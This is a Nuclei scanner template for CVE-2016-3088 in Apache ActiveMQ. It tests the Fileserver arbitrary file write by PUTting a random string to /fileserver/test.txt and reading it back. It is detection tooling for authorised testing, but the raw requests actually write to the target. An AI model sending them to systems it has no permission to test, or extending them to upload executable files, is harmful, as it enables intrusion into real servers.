44 lines
1.3 KiB
YAML
44 lines
1.3 KiB
YAML
id: CVE-2016-3088
|
|
|
|
info:
|
|
name: Apache ActiveMQ Fileserver - Arbitrary File Write
|
|
author: fq_hsu
|
|
severity: critical
|
|
description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/40857
|
|
- https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
|
|
- http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-3088
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2016-3088
|
|
cwe-id: CWE-20
|
|
tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive
|
|
metadata:
|
|
max-request: 2
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
PUT /fileserver/test.txt HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
{{randstr}}
|
|
|
|
- |
|
|
GET /fileserver/test.txt HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_1==204"
|
|
- "status_code_2==200"
|
|
- "contains((body_2), '{{randstr}}')"
|
|
condition: and
|
|
|
|
# Enhanced by mp on 2022/04/22
|